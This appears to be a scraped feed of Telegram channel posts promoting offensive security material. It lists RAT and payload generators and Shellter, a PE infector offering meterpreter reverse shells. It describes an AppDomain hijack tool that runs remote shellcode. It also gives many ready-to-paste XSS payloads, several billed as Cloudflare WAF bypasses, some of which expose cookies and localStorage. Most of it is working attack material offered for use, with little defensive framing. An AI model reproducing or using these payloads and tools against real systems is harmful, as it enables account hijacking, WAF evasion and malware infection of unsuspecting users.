Payload creation tools:

➕ The FatRat:
😸 GitHub

➕ Brutal:
😸 GitHub

➕ Stitch:
😸 GitHub

➕ MSFvenom Payload Creator:
😸 GitHub

➕ Venom Shellcode Generator:
😸 GitHub

➕ Spycam:
😸 GitHub

➕ Mob-Droid:
😸 GitHub

➕ Enigma:
😸 GItHub

#Payload #Rat #Tools
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3

Xss Payload

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;”



#Xss #Payload
➗➗➗➗➗➗➗➗➗➗➗➗
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3

👁 Shellter 👁

⚠️ The video tutorial is included in the file ⚠️

💬 is a dynamic shellcode injection tool aka dynamic PE infector.

📊 Payloads List:
⚪️ meterpreter_reverse_tcp
⚪️ meterpreter_reverse_http
⚪️ meterpreter_reverse_https
⚪️ meterpreter_bind_tcp
⚪️ shell_reverse_tcp
⚪️ shell_bind_tcp
⚪️ WinExec
⚪️ and many other options...

😸 Github

⬇️ Download
🔒 BugCod3

#shellter #msf #payload #bind
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

#XSS #Payload #Bypass #CF #WAF
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

Command Injection Payload List

⬇️ Download

#Payload #Command #Injection
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

🤖 AutoAppDomainHijack 🤖

💬
Tools to automate finding AppDomain hijacks and generating payloads from shellcode.

👤 HijackHunt:
Run this tool on the target. It will search recursively in the C:\ directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.

💡 AutoDomainHijack:
💻 Usage:

  AutoDomainHijack.exe (--version | -h | --help)

📊 Options:

-t, --target-name=<target-name>  Name of the target managed .exe to hijack.
-n, --hijack-name=<hijack-name>  Name of the hijacker .dll.
-u, --url=<url>                  URL of the remote shellcode to run.
-f, --file=<file>                File containing the shellcode to embed.
-o, --output=<output>            Full directory to write files to.
-e, --etw=<etw>                  Disable ETW. [default: true]
--version                    Prints version
-h, --help                       Show help message

📂 Build:

nimble build

😸 Github

⬇️ Download
🔒 BugCod3

#Hijack #Payload
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#BugBounty #Tips #Payload
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

CloudFlare Payload

<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>

#Payload #Cloudflare #Pentest
➖➖➖➖➖➖➖➖➖➖
📣 t.iss.one/BugCod3
📣 t.iss.one/A3l3_KA4

Cross Site Scripting Xss Payload

Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--

#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

payload

<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">

<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">

#Payload
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3